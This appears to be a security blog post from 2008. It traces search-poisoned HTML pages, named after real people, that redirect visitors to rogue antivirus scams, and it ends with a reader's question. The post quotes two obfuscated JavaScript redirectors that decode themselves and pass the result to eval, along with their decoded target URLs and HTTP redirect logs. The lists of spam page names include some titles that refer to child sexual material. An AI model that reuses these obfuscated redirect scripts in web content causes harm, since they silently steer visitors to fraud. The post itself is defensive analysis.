This was quite interesting. One of my co-workers just learned that there is a malicious html page with his name on it! When I downloaded the page down we realized that it was not a targetted attack, but a different variant of the malicious pages I reported under my MSN malicious results post.
This server actually had 3179 other html pages, each one with a name starting with Ryan-. The bad guys probably used a robot to collect information from web pages.
The script looks like the one reported before:
function zrwe(yry,dtj){if(!dtj){dtj=’SDedpfE96wCVaFkzrvK4;JhRtHNyo21{LsTn}-I+&38?QAucjlbGW*XBgmZ).Pq0′;}var y;var OR=”;for(var vadz=0;vadz<yry.length;vadz+=4){y=(dtj.indexOf(yry.charAt(vadz))&63)<<18|(dtj.indexOf(yry.charAt(vadz+1))&63)<<12|(dtj.indexOf(yry.charAt(vadz+2))&63)<<6|dtj.indexOf(yry.charAt(vadz+3))&63;OR+=String.fromCharCode((y&16711680)>>16,(y&65280)>>8,y&255);}eval(OR.substring(0,OR.length-3));}zrwe(’2X-uHEPBVIlctXfWNhPuzhJutXP}HJJKKKLTN9vWod&cVB2B2bmcyIl3yIJ}HRv-tBrutXPAVX-uVIF+N4.Bw+vGNG*82hlmVRvsoXQWVR6gFT*3Hda*VRrlke*ctI.gNTHW1RD-zhjIoXJcoIJIzK6?HhmnyXv-JJwwrXPAoEPuHhmWCEvctBJAHhmWV+w-HIJboIJbCKQTw+DsoIfAHRv-onW}NXJm2XPbHeHGH4W}oX;I2R6PaKH6JfvrR*wfv}JKvJ6P6TA-yIFcHEJJ;}-dyX*jyXm-y+r&HEPn2h*-y+ruJJwaCKQTwIv-HIf*y9v{NXJm2XPbHd*thfLTC4QL6eSL6SSS’);
And it translates into:
window.location=encodeURI(“hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=”+encodeURIComponent(document.referrer)+”¶meter=$keyword&se=$se&ur=1&HTTP_REFERER=”+encodeURIComponent(document.URL)+”&default_keyword=XXX”);
The redirection has changed to a different server:
hxxp://www.onlinedetect.com/in.cgi?7&tsk=july-task4-r86-id35-t18-obo8j&type=l&seoref=
Right now this is directing you to antivirus2008scanner.com, one of the multiple variants of rogue antivirus on the market. scan.wspscanner.com is another possible destination.
How difficult is to get to one of those pages?
Take google, and do a search for “Ryan mauskopf” (click on the image to see it full size) Ryan Maukopf is not my friend, I picked one of the random names…
Yep, the fourth result is a bad result. Ryan Mauskopf is one of other 3179 pages residing on that server’s folder. The hosting company has been notified, by the way, so dont be surprised if you find nothing when you go there.
I only saw pages starting with “Ryan” on this server, but there could potentially be other pages for different names. Here is a sample of the page names…
ryan-idirect.html ryan-idleman.html ryan-illingworth.html ryan-illy.html ryan-inana.html ryan-industries-cryogenic.html ryan-ingram-racquetball.html ryan-inman-nelsonville.html ryan-intenational-airlines.html ryan-international-airline-rubloff-pilots.html ryan-international-airlines-fine-oxygen-generators.html ryan-international-airlines-seat-assignment.html ryan-international-gurgaon-sector-40.html ryan-internatonal.html ryan-irelan.html ryan-irsik.html ryan-irvin-lovington-il.html ryan-irvin-lovington.html ryan-is-a-stupid-moue.html ryan-isaksen-internet-marketing.html ryan-isbister-st-thomas-ontario.html ryan-isensee.html ryan-isn-t-with-jolene-anymore.html ryan-israelsen.html ryan-iuliano.html ryan-iv-aerator.html ryan-j-aipperspach.html ryan-lee-4-minute-workouts.html ryan-lee-bergner.html ryan-lee-burnsville-mn.html ryan-lee-crewse.html ryan-lee-crosswait.html ryan-lee-latta-my-space.html ryan-lee-latta-south-carolina.html ryan-lee-s-summit-protein-bar.html ryan-leeder.html ryan-lefever.html ryan-leffel.html ryan-leggio.html ryan-lehky.html ryan-leli-on-radio.html ryan-lemelle.html ryan-lemen-jacksonville.html ryan-lemke-attorney-jude-milwaukee.html ryan-lemond.html ryan-lenderman.html ryan-lengel.html ryan-leonard-and-clarinet.html ryan-leslie-diamond-girl-mp3.html ryan-leslie-diamond-girl.html ryan-leslie-elektro.html ryan-leslie-over-easy-lyrics.html ryan-leslie-r-u-coming-back.html ryan-leslie-s-daw.html ryan-leslie-used-to-be-fabolous.html ryan-leslie-valentine-lyrics.html ryan-leslie-zombie.html ryan-lesondak.html ryan-lessman.html ryan-lessner.html ryan-lestina.html ryan-lestrange.html ryan-leverette.html ryan-leverson.html ryan-levin-hoffman-estates.html ryan-levinson-atlanta.html
So I took some of the page names and went fishing. Try with lamparek.html on MSN LiveSearch (Google also returns results)
We got 3 hits! Another ryan-lamparek and a rick-lamparek.html. I downloaded the pages from the user.aol.com link, there where 2001 of them. Some name samples:
bchs-prom-photos.html bebonow.html bechnel-roses.html becks-resturant-instow.html bedside-pistol-holster-surefire.html beefeater-tassles.html belardoo-mooloolabar.html belelaw.html belissima-bridal.html bellafonte-rena-brown.html bellatoria.html bellinghampublicschools.html beltonlegion.html benjarmine-dennis.html benneworth-photography.html benylpyridine.html beriliym.html beshear-mongirdo.html beth-shemesh-virtual-tourist.html bethann-javornik.html biatrix-profile.html bilakhia-holdings-pvt-lth.html binkawron.html biografia-guglielmo-berchicci.html biography-gauraw-patil.html bioyorghurt-nutritional-quality.html bir-baskadir-benim-memlektim.html bisex-hotelspalm-springs.html bittharts.html blacktantra.html bledisloe-cup-melbournetickets.html bloggerty.html blokesworld-lolli-galleries.html blondechevygirl.html blsckshorties.html bluesfeast.html boatfloorrepair.html bobsonoffred.html boca-chita-snapper.html boiza-steak-house.html bonecrusherkennel.html bonnie-zelicz.html bookstoresinyorkpa.html borgolson.html bourgiueav-flower.html bowenia-pricing.html boyd-lnew-zealand.html boys-comptop.html bradley-heithold-robins.html brazarrs.html brd-kulgen-ford.html breakitdowndesign.html brekelenkam-paintings-pics.html bremerton-navalhospital.html brendan-mcniff-amr.html brendon-vs-krzysztof-oliwa.html brennan-autism-crookwell-corner.html brewers-festivle.html brightpon-honda.html brimington-wheelwright.html britbike-co-dom.html broan-dehumidistat.html brocento.html buccas-restauant.html buddyshairpictureds.html bufahl.html buganik-gotfryd.html bulhmiller-rifle.html burgcity-underage-porn.html burmar-plumbing.html burmbomb-disney-guide.html burrellies.html burtins-grill.html businessobjectstips.html busty-advewntures.html bustypassiom.html buzzmedia-lolita.html byron-lomg.html calafia-ardent-courageous.html calatafimi-copoluoghi.html calaway-goly.html camaphluaged.html
… Up to 2000
This ones are a bit different, the script is not included on the page but later embebded:
<input type="hidden" id="mymenu" value="Glasgow Umarex Red Hawk"> < script src="menu.js"></script>
And our script is:
var text = document.getElementById("mymenu").value;
var tt; var kk; var mm; kk=""; tt="w|nd^w$l^c#[|^n;'([[*)!!b>s[s>#rc(w^rld$|nf^'";
for (i=0; i<tt.length+1; i++){mm=tt.substring (i,i+1);
if (mm=="(") mm="h"; if (mm=="*") mm="p"; if (mm=="!") mm="/"; if (mm==">") mm="e";if (mm=="$") mm=".";
if (mm=="[") mm="t"; if (mm=="#") mm="a"; if (mm=="^") mm="o"; if (mm=="]") mm="?"; if (mm=="@") mm="k";
if (mm=="{") mm="&"; if (mm==")") mm=":"; if (mm==";") mm="="; if (mm=="|") mm="i"; if (mm==" ") mm="+"; kk=kk+mm; }
eval (kk);
See how it passes the page name as a parameter? without it, you are going no where… Any way, this is where it’s going actually:
And this is our first stop:
hxxp://www.globalfreesearch.com/r.php
But they do not want us there…
126 <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <HTML><HEAD> <TITLE>302 Found</TITLE> </HEAD><BODY> <H1>Found</H1> The document has moved <A HREF="hxxp://www.globalfreesearch.com/r.php">here</A>.<P> <HR> <ADDRESS>Apache/1.3.39 Server at bestsearchworld.info Port 80</ADDRESS> </BODY></HTML>
So we keep moving…
HTTP/1.1 301 Moved Permanently Date: Fri, 25 Jul 2008 23:04:58 GMT Server: Apache/1.3.39 (Unix) mod_perl/1.30 PHP/5.2.4 mod_ssl/2.8.30 OpenSSL/0.9.7a X-Powered-By: PHP/5.2.4 Location: hxxp://bestsearchworld.info/z.html Keep-Alive: timeout=1, max=100 Connection: Keep-Alive Transfer-Encoding: chunked Content-Type: text/html
Finally, we arrive somewhere… Wait! Our browser may be infected with danger virus NetSky.q. We need to download a newer version of Antivirus 2008!
If you click on Details, we get a complementary scan courtesy of the guys from pc scanner online… (at least, today)
hxxp://pc-scanner-online.com/1/?xx=0&in=0&ag=0&end=1&g=0&affid=287&lid=501
Where you will be forced at some point go install their av, and pay.
What amazes me is the amount of work that this guys put on their pages. If you want to see their different landing pages, replace the “1″ after the .com/ wit different numbers. Each one will take you to a different landing page, but they all look the same underneath. You can tell it’s all the same people doing it.
Any way, more of the same. They are so easy to find on the internet that the amount of infected servers has to be huge. In half an hour doing this blog I found probably 10.000 infected pages…
Be safe out there.
Hi
For the last seven weeks doing a Google search of my name brings up different sites that all link to – antivirus2008scanner.com. Either directly or after clicking my name. These sites seem legitimate and after a week or so they no longer come up when searching my name. Is antivirus2008scanner.com hijacking these pages? How do they get away with this. How can I stop them from using my name?
Thanks for your help,
Shel